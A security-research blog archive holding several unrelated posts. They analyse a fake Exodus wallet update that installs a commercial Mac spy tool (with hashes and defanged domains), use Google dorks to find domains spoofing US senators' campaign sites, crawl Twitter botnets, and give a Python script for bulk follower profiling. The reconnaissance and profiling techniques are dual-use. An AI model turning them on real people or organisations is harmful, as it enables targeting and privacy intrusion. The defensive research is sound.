As strange as it sounds, I sometimes find powerpoint a good tool for arranging my thoughts, especially before writing a long document. As an added bonus, I have a presentation ready to go, should I need it.

 

 

Some members of the SHERPA project recently attended WebSummit in Lisbon – a four day event with over 70,000 attendees and over 70 dedicated discussions and panels. Topics related to artificial intelligence were prevalent this year, ranging from tech presentations on how to develop better AI, to existential debates on the implications of AI on the environment and humanity. The event attracted a wide range of participants, including many technologists, politicians, and NGOs.

During WebSummit, SHERPA members participated in the Social Innovation Village, where they joined forces with projects and initiatives such as Next Generation Internet, CAPPSI, MAZI, DemocratieOuverte, grassroots radio, and streetwize to push for “more social good in technology and more technology in social good”. Here, SHERPA researchers showcased the work they’ve already done to deepen the debate on the implications of AI in policing, warfare, education, health and social care, and transport.

The presentations attracted the keen interest of representatives from more than 100 large and small organizations and networks in Europe and further afield, including the likes of Founder’s Institute, Google, and Amazon, and also led to a public commitment by Carlos Moedas, the European Commissioner for Research, Science and Innovation. You can listen to the highlights of the conversation here.

To get a preview of SHERPA’s scenario work and take part in the debate click here.

 


* If you’re wondering why I haven’t blogged in a long while, it’s because I’ve been hiding away, working on a bunch of AI-related research projects (such as this). Down the road, I’m hoping to post more articles and code – if and when I have results to share 😉



Spam campaign targets Exodus Mac Users

We’ve seen a small spam campaign that attempts to target Mac users that use Exodus, a multi-cryptocurrency wallet.

The theme of the email focuses mainly on Exodus. The attachment was named “Exodus-MacOS-1.64.1-update.zip” and the sender domain was “update-exodus[.]io”, suggesting that the sender wanted to associate itself with the organization. The email attempted to deliver a fake Exodus update, using the subject “Update 1.64.1 Release – New Assets and more”. However, the latest released version of Exodus is actually 1.63.1.

Fake Exodus Update email

Extracting the attached archive leads to the application which was apparently created yesterday.

Spytool’s creation date

The application contains a Mach-O binary with the filename “rtcfg”. The legitimate Exodus application, however, uses “Exodus”.

We checked out the strings and found a bunch of references to “realtime-spy-mac[.]com” website.

On its website, the developer describes the software as a cloud-based surveillance and remote spy tool. The standard offering costs $79.95 and comes with a cloud-based account where users can view the images and data that the tool uploads from the target machine. The strings extracted from the Mac binary in the spam campaign coincide with the features mentioned on the realtime-spy-mac[.]com site.

Strings inside the Realtime-Spy tool

Searching for similar instances of the Mac keylogger in our repository yielded other samples using these filenames:

  • taxviewer.app
  • picupdater.app
  • macbook.app
  • launchpad.app

Based on the spy tool's website, it appears to support not only Mac but Windows as well. It's not the first time we've seen Windows threats target Mac. As the Windows crimeware threat actors take advantage of the cryptocurrency trend, they too seem to want to expand their reach, and have thus ended up targeting Mac users as well.

Indicators of Compromise

SHA1:

  • b6f5a15d189f4f30d502f6e2a08ab61ad1377f6a – rtcfg
  • 3095c0450871f4e1d14f6b1ccaa9ce7c2eaf79d5 – Exodus-MacOS-1.64.1-update.zip
  • 04b9bae4cc2dbaedc9c73c8c93c5fafdc98983aa – picupdater.app.zip
  • c22e5bdcb5bf018c544325beaa7d312190be1030 – taxviewer.app.zip
  • d3150c6564cb134f362b48cee607a5d32a73da66 – launchpad.app.zip
  • bf54f81d7406a7cfe080b42b06b0a6892fcd2f37 – macbook.app.zip

Detection:

  • Monitor:OSX/Realtimespy.b6f5a15d18!Online

Domain:

  • realtime-spy-mac[.]com
  • update-exodus[.]io

 



Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) […]

2018-08-31

Taking Pwnie Out On The Town

Black Hat 2018 is now over, and the winners of the Pwnie Awards have been published. The Best Client-Side Bug was awarded to Georgi Geshev and Rob Miller for their work called “The 12 Logic Bug Gifts of Christmas.” Georgi and Rob work for MWR Infosecurity, which (as some of you might remember) was acquired by F-Secure […]

2018-08-14

How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details. And many of the subsequent (non-technical) articles that have been published have focused almost exclusively on […]

2018-07-30

Video: Creating Graph Visualizations With Gephi

I wanted to create a how-to blog post about creating gephi visualizations, but I realized it’d probably need to include, like, a thousand embedded screenshots. So I made a video instead.

2018-05-24

Pr0nbots2: Revenge Of The Pr0nbots

A month and a half ago I posted an article in which I uncovered a series of Twitter accounts advertising adult dating (read: scam) websites. If you haven’t read it yet, I recommend taking a look at it before reading this article, since I’ll refer back to it occasionally. To start with, let’s recap. In my […]

2018-05-04

Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an […]

2018-03-16

How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same […]

2018-02-27

Improving Caching Strategies With SSICLOPS

F-Secure development teams participate in a variety of academic and industrial collaboration projects. Recently, we’ve been actively involved in a project codenamed SSICLOPS. This project has been running for three years, and has been a joint collaboration between ten industry partners and academic entities. Here’s the official description of the project. “The Scalable and Secure […]

2018-02-26

Searching Twitter With Twarc

Twarc makes it really easy to search Twitter via the API. Simply create a twarc object using your own API keys and then pass your search query into twarc’s search() function to get a stream of Tweet objects. Remember that, by default, the Twitter API will only return results from the last 7 days. However, […]

2018-02-16

NLP Analysis Of Tweets Using Word2Vec And T-SNE

In the context of some of the Twitter research I’ve been doing, I decided to try out a few natural language processing (NLP) techniques. So far, word2vec has produced perhaps the most meaningful results. Wikipedia describes word2vec very precisely: “Word2vec takes as its input a large corpus of text and produces a vector space, typically of several […]

2018-01-30

Value-Driven Cybersecurity

Constructing an Alliance for Value-driven Cybersecurity (CANVAS) launched ~two years ago with F-Secure as a member. The goal of the EU project is “to unify technology developers with legal and ethical scholars and social scientists to approach the challenge of how cybersecurity can be aligned with European values and fundamental rights.” (That’s a mouthful, right?) Basically, Europe wants to align cybersecurity and human rights.

If you don’t see the direct connection between human rights and cybersecurity, consider this: the EU’s General Data Protection Regulation (GDPR) is human rights law. Everybody’s data is covered by GDPR. Meanwhile, in the USA… California’s legislature is working on a data privacy bill, and there’s now a growing number of lobbyists fighting over how to define just what a “consumer” is. So, in the USA, data protection is not human rights law, it’s consumer protection law (and there are likely to be plenty of legal loopholes). And in the end, not everybody’s data will be covered.

So there you go, the EU sees cybersecurity as something that affects everybody, and the CANVAS project is part of its efforts to ensure that the rights of all are respected.

As part of the project, on May 28th & 29th of this year, a workshop was organized by F-Secure at our HQ on ethics-related challenges that cybersecurity companies and cooperating organizations face in their research and operations. Which is to say, what are the considerations that cybersecurity companies and related organizations must take into account to be upstanding citizens?

The theme made for excellent workshop material. Also, the weather was uncharacteristically cooperative (we picked May to increase the odds in our favor), the presentations were great, and the resulting discussions were lively.

Topics included:

  • Investigation of nation-state cyber operations.
  • Vulnerability disclosure and the creation of proof-of-concept code for: public awareness; incentivizing vulnerability fixing efforts; security research; penetration testing; and other purposes.
  • Control of personal devices. Backdoors and use of government sponsored “malware” as possible countermeasures to the ubiquitous use of encryption.
  • Ethics, artificial intelligence, and cybersecurity.
  • Assisting law enforcement agencies without violating privacy, a CERT viewpoint.
  • Targeted attacks and ethical choices arising due to attacker and defender operations.
  • Privacy and its assurance through data economy and encryption, balancing values with financial interests of companies.

The workshop participants included a mix of cybersecurity practitioners and representatives from policy focused organizations. The Chatham House rule (in particular, no recording policy) was used to allow for free and open discussion.

So, in that spirit, names and talks won’t be included in the text of this post. But, for those who are interested in reading more, approved bios and presentation summaries can be found in the workshop report (final draft).

Next up on the CANVAS agenda for F-Secure?

CISO Erka Koivunen will be in Switzerland next week (September 5th & 6th) at The Bern University of Applied Sciences attending a workshop on: Cybersecurity Challenges in the Government Sphere – Ethical, Legal and Technical Aspects.

Erka has worked in government in the past, so his perspective covers both sides of the fence. His presentation is titled: Serve the customer by selling… tainted goods?! Why F-Secure too will start publishing Transparency Reports.



Taking Pwnie Out On The Town

Black Hat 2018 is now over, and the winners of the Pwnie Awards have been published. The Best Client-Side Bug was awarded to Georgi Geshev and Rob Miller for their work called “The 12 Logic Bug Gifts of Christmas.”

Pwnies2018 The Pwnie Awards

Georgi and Rob work for MWR Infosecurity, which (as some of you might remember) was acquired by F-Secure earlier this year. Both MWR and F-Secure have a long history of geek culture. One thing we’ve done for years, is to take our trophies (or “Poikas”) for a trip around the town. For an example, see this.

So, while the Pwnie is still here in Helsinki before going home to the UK, we took it around the town!

Pwnie2018 HQ

Pwnie at the F-Secure HQ.

Pwnie2018 Kanava

Pwnie at Ruoholahdenkanava.

Pwnie2018 Harbour

Pwnie at the West Harbour.

Pwnie2018 Baana

Pwnie looks at the Baana.

Pwnie2018 Museum

Pwnie and some Atari 2600s and laptops at the Helsinki computer museum.

Pwnie2018 MIG

Pwnie looking at a Mikoyan-Gurevich MiG-21 supersonic interceptor.

Pwnie2018 Tennispalatsi

Pwnie at the Art Museum.

Pwnie2018 awards

Pwnie chilling on our award shelf.

Pwnie2018 Parliament

Pwnie at the house of parliament.

pwnie2018_tuomiokirkko

Pwnie at the Tuomiokirkko Cathedral.

Thanks for all the bugs, MWR!

Mikko

P.S. If you’re wondering about the word “Poika” we use for trophies, here’s a short documentary video that explains it in great detail.



How To Locate Domains Spoofing Campaigns (Using Google Dorks) #Midterms2018

The government accounts of US Senator Claire McCaskill (and her staff) were targeted in 2017 by APT28 A.K.A. “Fancy Bear” according to an article published by The Daily Beast on July 26th. Senator McCaskill has since confirmed the details.

And many of the subsequent (non-technical) articles have focused almost exclusively on the fact that McCaskill is running for re-election in 2018. But is it really conclusive that this hacking attempt was about the 2018 midterms? After all, Senator McCaskill is the top-ranking Democrat on the Homeland Security & Governmental Affairs Committee and also sits on the Armed Services Committee. Perhaps she and her staffers were instead targeted for insights into ongoing Senate investigations?

Senator Claire McCaskill's Committee Assignments

Because if you want to target an election campaign, you should target the candidate’s campaign server, not their government accounts. (Elected officials cannot use government accounts/resources for their personal campaigns.) In the case of Senator McCaskill, the campaign server is: clairemccaskill.com.

Which appears to be a WordPress site.

clairemccaskill.com/robots.txt

Running on an Apache server.

clairemccaskill.com Apache error log

And it has various e-mail addresses associated with it.

clairemccaskill.com email addresses

That looks interesting, right? So… let’s do some Google dorking!

Searching for “clairemccaskill.com” in URLs while discarding the actual site yielded a few pages of results.

Google dork: inurl:clairemccaskill.com -site:clairemccaskill.com

And on page two of those results, this…

clairemccaskill.com.de

Definitely suspicious.

What is com.de? It's a domain under the .de TLD (not a TLD itself).

.com.de

Okay, so… what other interesting domains associated with com.de are there to discover?

How about additional US Senators up for re-election such as Florida Senator Bill Nelson? Yep.

nelsonforsenate.com.de

Senator Bob Casey? Yep.

bobcasey.com.de

And Senator Sheldon Whitehouse? Yep.

whitehouseforsenate.com.de

But that’s not all. Democrats aren’t the only ones being spoofed.

Iowa Senate Republicans.

iowasenaterepublicans.com.de

And “Senate Conservatives“.

senateconservatives.com.de

Hmm. Well, while we are no closer to knowing whether or not Senator McCaskill’s government accounts were actually targeted because of the midterm elections, the domains shown above are definitely shady AF. They are certainly enough to give cause for concern that the 2018 midterms are indeed being targeted, by somebody.

(Our research continues.)

Meanwhile, the FBI might want to get in touch with the owners of com.de.



Video: Creating Graph Visualizations With Gephi

I wanted to create a how-to blog post about creating gephi visualizations, but I realized it’d probably need to include, like, a thousand embedded screenshots. So I made a video instead.



Pr0nbots2: Revenge Of The Pr0nbots

A month and a half ago I posted an article in which I uncovered a series of Twitter accounts advertising adult dating (read: scam) websites. If you haven’t read it yet, I recommend taking a look at it before reading this article, since I’ll refer back to it occasionally.

To start with, let’s recap. In my previous research, I used a script to recursively query Twitter accounts for specific patterns, and found just over 22,000 Twitter bots using this process. This figure was based on the fact that I concluded my research (stopped my script) after querying only 3000 of the 22,000 discovered accounts. I have a suspicion that my script would have uncovered a lot more accounts, had I let it run longer.

This week, I decided to re-query all the Twitter IDs I found in March, to see if anything had changed. To my surprise, I was only able to query 2895 of the original 21964 accounts, indicating that Twitter has taken action on most of those accounts.

In order to find out whether the culled accounts were deleted or suspended, I wrote a small Python script that used the requests module to query each account's URL directly. A 404 error indicated that the account had been removed or renamed; any other reply indicated that the account was suspended. Of the 19069 culled accounts checked, 18932 were suspended and 137 were deleted or renamed.
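A minimal sketch of that check, with the decision logic separated from the network call; the exact "suspended" URL marker is an assumption about how Twitter redirected suspended profiles at the time, not something stated in the post:

```python
def classify_response(status_code, final_url):
    # Pure decision logic, separated from the network call so it can be
    # tested offline. The "suspended" marker is an assumption about how
    # Twitter redirected suspended profiles at the time.
    if status_code == 404:
        return "deleted_or_renamed"
    if "suspended" in final_url:
        return "suspended"
    return "active"

def classify_account(screen_name):
    # Network half of the check, using the requests module mentioned above.
    # Imported here so the offline logic has no third-party dependency.
    import requests
    r = requests.get(f"https://twitter.com/{screen_name}", timeout=10)
    return classify_response(r.status_code, r.url)
```

In practice such a loop would also need throttling, since hammering thousands of profile URLs in quick succession invites rate limiting.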

I also checked the surviving accounts in a similar manner, using requests to identify which ones were “restricted” (by checking for specific strings in the html returned from the query). Of the 2895 surviving accounts, 47 were set to restricted and the other 2848 were not.

As noted in my previous article, the accounts identified during my research had creation dates ranging from a few days old to over a decade in age. I checked the creation dates of both the culled set and the survivors' set (using my previously recorded data) for patterns, but I couldn't find any. Here they are, for reference:

Based on the connectivity I recorded between the original bot accounts, I’ve created a new graph visualization depicting the surviving communities. Of the 2895 survivors, only 402 presumably still belong to the communities I observed back then. The rest of the accounts were likely orphaned. Here’s a representation of what the surviving communities might look like, if the entity controlling these accounts didn’t make any changes in the meantime.

By the way, I’m using Gephi to create these graph visualizations, in case you were wondering.

Erik Ellason (@slickrockweb) contacted me recently with some evidence that the bots I’d discovered might be re-tooling. He pointed me to a handful of accounts that contained the shortened URL in a pinned tweet (instead of in the account’s description). Here’s an example profile:

Fetching a user object using the Twitter API will also return the last tweet that account published, but I’m not sure it would necessarily return the pinned Tweet. In fact, I don’t think there’s a way of identifying a pinned Tweet using the standard API. Hence, searching for these accounts by their promotional URL would be time consuming and problematic (you’d have to iterate through their tweets).

Fortunately, automating the discovery of Twitter profiles similar to those Erik showed me was fairly straightforward. Like the previous botnet, the accounts could be crawled due to the fact that they follow each other. Also, all of these new accounts had text in their descriptions that followed a predictable pattern. Here are a few examples of those sentences:

look url in last post
go on link in top tweet
go at site in last post

It was trivial to construct a simple regular expression to find all such sentences:

desc_regex = "(look|go on|go at|see|check|click) (url|link|site) in (top|last) (tweet|post)"
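Applied with Python's re module, the pattern flags the formulaic bios above while ignoring ordinary descriptions (the "normal bio" example is mine, added for contrast):

```python
import re

desc_regex = r"(look|go on|go at|see|check|click) (url|link|site) in (top|last) (tweet|post)"

bios = [
    "look url in last post",
    "go on link in top tweet",
    "go at site in last post",
    "just a normal bio",
]
flagged = [b for b in bios if re.search(desc_regex, b)]
print(flagged)  # the first three match; the normal bio does not
```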

I modified my previous script to include the above regular expression, seeded it with the handful of accounts that Erik had provided, and let it run. After 24 hours, my new script had identified just over 20,000 accounts. Mapping the follower/following relationships between these accounts gave me the following graph:

As we zoom in, you'll notice that these accounts are far more connected than those of the older botnet. The 20,000 or so accounts identified at this point map to just over 100 separate communities. With roughly the same number of accounts, the previous botnet contained over 1000 communities.

Zooming in further shows the presence of “hubs” in each community, similar to those in the previous botnet.

Given that this botnet showed a greater degree of connectivity than the previous one studied, I decided to continue my discovery script and collect more data. The discovery rate of new accounts slowed slightly after the first 24 hours, but remained steady for the rest of the time it was running. After 4 days, my script had found close to 44,000 accounts.

And eight days later, the total was just over 80,000.

Here’s another way of visualizing that data:


Here’s the size distribution of communities detected in the 80,000-node graph. Smaller community sizes may indicate places where my discovery script hadn't yet looked. The largest communities contained over 1000 accounts. There may be a way of searching more efficiently for these accounts by prioritizing crawling within smaller communities, but this is something I've yet to explore.

I shut down my discovery script at this point, having queried just over 30,000 accounts. I’m fairly confident this rabbit hole goes a lot deeper, but it would have taken weeks to query the next 50,000 accounts, not to mention the countless more that would have been added to the list during that time.

As with the previous botnet, the creation dates of these accounts spanned over a decade.

Here’s the oldest account I found.

Using the same methodology I used to analyze the survivor accounts from the old botnet, I checked which of these new accounts were restricted by Twitter. There was an almost exactly even split between restricted and non-restricted accounts in this new set.

Given that these new bots show many similarities to the previously discovered botnet (similar avatar pictures, same URL shortening services, similar usage of the English language) we might speculate that this new set of accounts is being managed by the same entity as those older ones. If this is the case, a further hypothesis is that said entity is re-tooling based on Twitter’s action against their previous botnet (for instance, to evade automation).

Because these new accounts use a pinned Tweet to advertise their services, we can test this hypothesis by examining the creation dates of the most recent Tweet from each account. If the entity is indeed re-tooling, all of the accounts should have Tweeted fairly recently. However, a brief examination of last tweet dates for these accounts revealed a rather large distribution, tracing back as far as 2012. The distribution had a long tail, with a majority of the most recent Tweets having been published within the last year. Here’s the last year’s worth of data graphed.

Here’s the oldest Tweet I found:

This data, on its own, would refute the theory that the owner of this botnet has recently been re-tooling. However, a closer look at some of the discovered accounts reveals an interesting story. Here are a few examples.

This account took a 6 year break from Twitter, and switched language to English.

This account mentions a “url in last post” in its bio, but there isn’t one.

This account went from posting in Korean to posting in English, with a 3 year break in between. However, the newer Tweet mentions “url in bio”. Sounds vaguely familiar.

Examining the text contained in the last Tweets from these discovered accounts revealed around 76,000 unique Tweets. Searching these Tweets for links containing the URL shortening services used by the previous botnet revealed 8,200 unique Tweets. Here’s a graph of the creation dates of those particular Tweets.
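That search amounts to a simple substring filter; the shortener domains used below are the ones identified in the earlier "Dirty Tinder" research, and the sample tweets are illustrative, not real data:

```python
import re

# URL-shortener domains observed in the previous botnet's account bios
SHORTENERS = ["me2url.info", "url4.pro", "click2go.info",
              "move2.pro", "zen5go.pro", "go9to.pro"]
pattern = re.compile("|".join(re.escape(d) for d in SHORTENERS))

def tweets_with_shorteners(tweets):
    # Keep only tweets containing one of the known shortener domains
    return [t for t in tweets if pattern.search(t)]

tweets = ["check this me2url.info/abc", "nothing to see here"]
print(tweets_with_shorteners(tweets))  # -> ['check this me2url.info/abc']
```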

As we can see, the Tweets containing shortened URLs date back only 21 days. Here’s a distribution of domains seen in those Tweets.

My current hypothesis is that the owner of the previous botnet has purchased a batch of Twitter accounts (of varying ages) and has been, at least for the last 21 days, repurposing those accounts to advertise adult dating sites using the new pinned-Tweet approach.

One final thing – I checked the 2895 survivor accounts from the previously discovered botnet to see if any had been reconfigured to use a pinned Tweet. At the time of checking, only one of those accounts had been changed.

If you’re interested in looking at the data I collected, I’ve uploaded names/ids of all discovered accounts, the follower/following mappings found between these accounts, the gephi save file for the 80,000 node graph, and a list of accounts queried by my script (in case someone would like to continue iterating through the unqueried accounts.) You can find all of that data in this github repo.



Marketing “Dirty Tinder” On Twitter

About a week ago, a Tweet I was mentioned in received a dozen or so “likes” over a very short time period (about two minutes). I happened to be on my computer at the time, and quickly took a look at the accounts that generated those likes. They all followed a similar pattern. Here’s an example of one of the accounts’ profiles:

This particular avatar was very commonly used as a profile picture in these accounts.

All of the accounts I checked contained similar phrases in their description fields. Here’s a list of common phrases I identified:

  • Check out
  • Check this
  • How do you like my site
  • How do you like me
  • You love it harshly
  • Do you like fast
  • Do you like it gently
  • Come to my site
  • Come in
  • Come on
  • Come to me
  • I want you
  • You want me
  • Your favorite
  • Waiting you
  • Waiting you at

All of the accounts also contained links to URLs in their description field that pointed to domains such as the following:

  • me2url.info
  • url4.pro
  • click2go.info
  • move2.pro
  • zen5go.pro
  • go9to.pro

It turns out these are all shortened URLs, and the service behind each of them has the exact same landing page:

“I will ban drugs, spam, porn, etc.” Yeah, right.

My colleague, Sean, checked a few of the links and found that they landed on “adult dating” sites. Using a VPN to change the browser’s exit node, he noticed that the landing pages varied slightly by region. In Finland, the links ended up on a site called “Dirty Tinder”.

Checking further, I noticed that some of the accounts either followed, or were being followed by other accounts with similar traits, so I decided to write a script to programmatically “crawl” this network, in order to see how large it is.

The script I wrote was rather simple. It was seeded with the dozen or so accounts that I originally witnessed, and was designed to iterate friends and followers for each user, looking for other accounts displaying similar traits. Whenever a new account was discovered, it was added to the query list, and the process continued. Of course, due to Twitter API rate limit restrictions, the whole crawler loop was throttled so as to not perform more queries than the API allowed for, and hence crawling the network took quite some time.
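In case it's useful to others, the crawl logic can be sketched roughly as follows. This is a simplified, self-contained illustration rather than the actual script: fetch_related() and is_suspicious() are hypothetical stand-ins for the Twitter API calls and the full trait checks, and the phrase list is just a sample of the description phrases listed earlier.

```python
from collections import deque

# Sample of phrases seen in the accounts' description fields (see list above)
SPAM_PHRASES = ["check out", "come to my site", "i want you", "waiting you"]

def looks_like_spam_profile(description):
    """Heuristic trait check against phrases seen in the accounts' bios."""
    d = description.lower()
    return any(p in d for p in SPAM_PHRASES)

def crawl(seeds, fetch_related, is_suspicious, max_queries=1000):
    """Breadth-first crawl: queue each newly discovered matching account.

    fetch_related(account) should return the account's friends and followers;
    is_suspicious(account) should apply trait checks like the one above.
    """
    discovered = set(seeds)
    queue = deque(seeds)
    queries = 0
    while queue and queries < max_queries:
        account = queue.popleft()
        queries += 1
        for related in fetch_related(account):
            if related not in discovered and is_suspicious(related):
                discovered.add(related)
                queue.append(related)
    return discovered
```

The real script additionally throttled itself to stay within Twitter's API rate limits, which is why crawling the network took days rather than minutes.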

My script recorded a graph of which accounts were following/followed by which other accounts. After a few hours I checked the output and discovered an interesting pattern:

Graph of follower/following relationships between identified accounts after about a day of running the discovery script.

The discovered accounts seemed to be forming independent “clusters” (through follow/friend relationships). This is not what you’d expect from a normal social interaction graph.

After running for several days the script had queried about 3000 accounts, and discovered a little over 22,000 accounts with similar traits. I stopped it there. Here’s a graph of the resulting network.

Pretty much the same pattern I’d seen after one day of crawling still existed after one week; only a few of the clusters weren’t “flower” shaped. Here are a few zoomed-in views of the graph.

 

Since I’d originally noticed several of these accounts liking the same tweet over a short period of time, I decided to check if the accounts in these clusters had anything in common. I started by checking this one:

Oddly enough, there were absolutely no similarities between these accounts. They were all created at very different times and all Tweeted/liked different things at different times. I checked a few other clusters and obtained similar results.

One interesting thing I found was that the accounts were created over a very long time period. Some of the accounts discovered were over eight years old. Here’s a breakdown of the account ages:

As you can see, this group contains fewer new accounts than older ones. The big spike in the middle of the chart represents accounts that are about six years old. One likely reason there are fewer new accounts in this network is that Twitter’s automation seems able to flag suspicious behaviors or patterns in fresh accounts and automatically restrict or suspend them. In fact, while my crawler was running, many of the accounts in the graphs above were restricted or suspended.

Here are a few more breakdowns – Tweets published, likes, followers and following.

Here’s a collage of some of the profile pictures found. I modified a python script to generate this – far better than using one of those “free” collage making tools available on the Internets. 🙂

So what are these accounts doing? For the most part, it seems they’re simply trying to advertise the “adult dating” sites linked in the account profiles. They do this by liking, retweeting, and following random Twitter accounts at random times, fishing for clicks. I did find one that had been helping to sell stuff:

Individually the accounts probably don’t break any of Twitter’s terms of service. However, all of these accounts are likely controlled by a single entity. This network of accounts seems quite benign, but in theory, it could be quickly repurposed for other tasks including “Twitter marketing” (paid services to pad an account’s followers or engagement), or to amplify specific messages.

If you’re interested, I’ve saved a list of both screen_name and id_str for each discovered account here. You can also find the scraps of code I used while performing this research in that same github repo.



How To Get Twitter Follower Data Using Python And Tweepy

In January 2018, I wrote a couple of blog posts outlining some analysis I’d performed on followers of popular Finnish Twitter profiles. A few people asked that I share the tools used to perform that research. Today, I’ll share a tool similar to the one I used to conduct that research, and at the same time, illustrate how to obtain data about a Twitter account’s followers.

This tool uses Tweepy to connect to the Twitter API. In order to enumerate a target account’s followers, I like to start with Tweepy’s followers_ids() function, which returns a list of Twitter ids of accounts that are following the target. This call completes in a single query, and gives us a list of Twitter ids that can be saved for later use (since both screen_name and name can be changed, but an account’s id never changes). Once I’ve obtained a list of Twitter ids, I can use Tweepy’s lookup_users(user_ids=batch) to obtain a Twitter User object for each Twitter id. As far as I know, this isn’t exactly the documented way of obtaining this data, but it suits my needs. /shrug

Once a full set of Twitter User objects has been obtained, we can perform analysis on it. In the following tool, I chose to look at the account age and friends_count of each account returned, print a summary, and save a summarized form of each account’s details as json, for potential further processing. Here’s the full code:

from tweepy import OAuthHandler
from tweepy import API
from collections import Counter
from datetime import datetime, date, time, timedelta
import sys
import json
import os
import io
import re
import time

# Helper functions to load and save intermediate steps
def save_json(variable, filename):
    with io.open(filename, "w", encoding="utf-8") as f:
        f.write(unicode(json.dumps(variable, indent=4, ensure_ascii=False)))

def load_json(filename):
    ret = None
    if os.path.exists(filename):
        try:
            with io.open(filename, "r", encoding="utf-8") as f:
                ret = json.load(f)
        except:
            pass
    return ret

def try_load_or_process(filename, processor_fn, function_arg):
    # This script only works with json files, so we always use the json
    # helpers defined above
    load_fn = load_json
    save_fn = save_json
    if os.path.exists(filename):
        print("Loading " + filename)
        return load_fn(filename)
    else:
        ret = processor_fn(function_arg)
        print("Saving " + filename)
        save_fn(ret, filename)
        return ret

# Some helper functions to convert between different time formats and perform date calculations
def twitter_time_to_object(time_string):
    twitter_format = "%a %b %d %H:%M:%S %Y"
    match_expression = "^(.+)\s(\+[0-9][0-9][0-9][0-9])\s([0-9][0-9][0-9][0-9])$"
    match = re.search(match_expression, time_string)
    if match is not None:
        first_bit = match.group(1)
        second_bit = match.group(2)
        last_bit = match.group(3)
        new_string = first_bit + " " + last_bit
        date_object = datetime.strptime(new_string, twitter_format)
        return date_object

def time_object_to_unix(time_object):
    return int(time_object.strftime("%s"))

def twitter_time_to_unix(time_string):
    return time_object_to_unix(twitter_time_to_object(time_string))

def seconds_since_twitter_time(time_string):
    input_time_unix = int(twitter_time_to_unix(time_string))
    current_time_unix = int(get_utc_unix_time())
    return current_time_unix - input_time_unix

def get_utc_unix_time():
    dts = datetime.utcnow()
    return time.mktime(dts.timetuple())

# Get a list of follower ids for the target account
def get_follower_ids(target):
    return auth_api.followers_ids(target)

# Twitter API allows us to batch query 100 accounts at a time
# So we'll create batches of 100 follower ids and gather Twitter User objects for each batch
def get_user_objects(follower_ids):
    batch_len = 100
    num_batches = len(follower_ids) / batch_len
    batches = (follower_ids[i:i+batch_len] for i in range(0, len(follower_ids), batch_len))
    all_data = []
    for batch_count, batch in enumerate(batches):
        sys.stdout.write("\r")
        sys.stdout.flush()
        sys.stdout.write("Fetching batch: " + str(batch_count) + "/" + str(num_batches))
        sys.stdout.flush()
        users_list = auth_api.lookup_users(user_ids=batch)
        users_json = (map(lambda t: t._json, users_list))
        all_data += users_json
    return all_data

# Creates one week length ranges and finds items that fit into those range boundaries
def make_ranges(user_data, num_ranges=20):
    range_max = 604800 * num_ranges
    range_step = range_max/num_ranges

# We create ranges and labels first and then iterate these when going through the whole list
# of user data, to speed things up
    ranges = {}
    labels = {}
    for x in range(num_ranges):
        start_range = x * range_step
        end_range = x * range_step + range_step
        label = "%02d" % x + " - " + "%02d" % (x+1) + " weeks"
        labels[label] = []
        ranges[label] = {}
        ranges[label]["start"] = start_range
        ranges[label]["end"] = end_range
    for user in user_data:
        if "created_at" in user:
            account_age = seconds_since_twitter_time(user["created_at"])
            for label, timestamps in ranges.iteritems():
                if account_age > timestamps["start"] and account_age < timestamps["end"]:
                    entry = {} 
                    id_str = user["id_str"] 
                    entry[id_str] = {} 
                    fields = ["screen_name", "name", "created_at", "friends_count", "followers_count", "favourites_count", "statuses_count"] 
                    for f in fields: 
                        if f in user: 
                            entry[id_str][f] = user[f] 
                    labels[label].append(entry) 
    return labels

if __name__ == "__main__": 
    account_list = [] 
    if (len(sys.argv) > 1):
        account_list = sys.argv[1:]

    if len(account_list) < 1:
        print("No parameters supplied. Exiting.")
        sys.exit(0)

    consumer_key=""
    consumer_secret=""
    access_token=""
    access_token_secret=""

    auth = OAuthHandler(consumer_key, consumer_secret)
    auth.set_access_token(access_token, access_token_secret)
    auth_api = API(auth)

    for target in account_list:
        print("Processing target: " + target)

# Get a list of Twitter ids for followers of target account and save it
        filename = target + "_follower_ids.json"
        follower_ids = try_load_or_process(filename, get_follower_ids, target)

# Fetch Twitter User objects from each Twitter id found and save the data
        filename = target + "_followers.json"
        user_objects = try_load_or_process(filename, get_user_objects, follower_ids)
        total_objects = len(user_objects)

# Record a few details about each account that falls between specified age ranges
        ranges = make_ranges(user_objects)
        filename = target + "_ranges.json"
        save_json(ranges, filename)

# Print a few summaries
        print
        print("\t\tFollower age ranges")
        print("\t\t===================")
        total = 0
        following_counter = Counter()
        for label, entries in sorted(ranges.iteritems()):
            print("\t\t" + str(len(entries)) + " accounts were created within " + label)
            total += len(entries)
            for entry in entries:
                for id_str, values in entry.iteritems():
                    if "friends_count" in values:
                        following_counter[values["friends_count"]] += 1
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print
        print("\t\tMost common friends counts")
        print("\t\t==========================")
        total = 0
        for num, count in following_counter.most_common(20):
            total += count
            print("\t\t" + str(count) + " accounts are following " + str(num) + " accounts")
        print("\t\tTotal: " + str(total) + "/" + str(total_objects))
        print
        print

Let’s run this tool against a few accounts and see what results we get. First up: @realDonaldTrump

Age ranges of new accounts following @realDonaldTrump

As we can see, over 80% of @realDonaldTrump’s last 5000 followers are very new accounts (less than 20 weeks old), with a majority of those being under a week old. Here’s the top friends_count values of those accounts:

Most common friends_count values seen amongst the new accounts following @realDonaldTrump

No obvious pattern is present in this data.

Next up, an account I looked at in a previous blog post – @niinisto (the president of Finland).

Age ranges of new accounts following @niinisto

Many of @niinisto’s last 5000 followers are new Twitter accounts, although not in as large a proportion as in the @realDonaldTrump case. In both of the above cases, this is to be expected, since both accounts are recommended to new users of Twitter. Let’s look at the friends_count values for the above set.

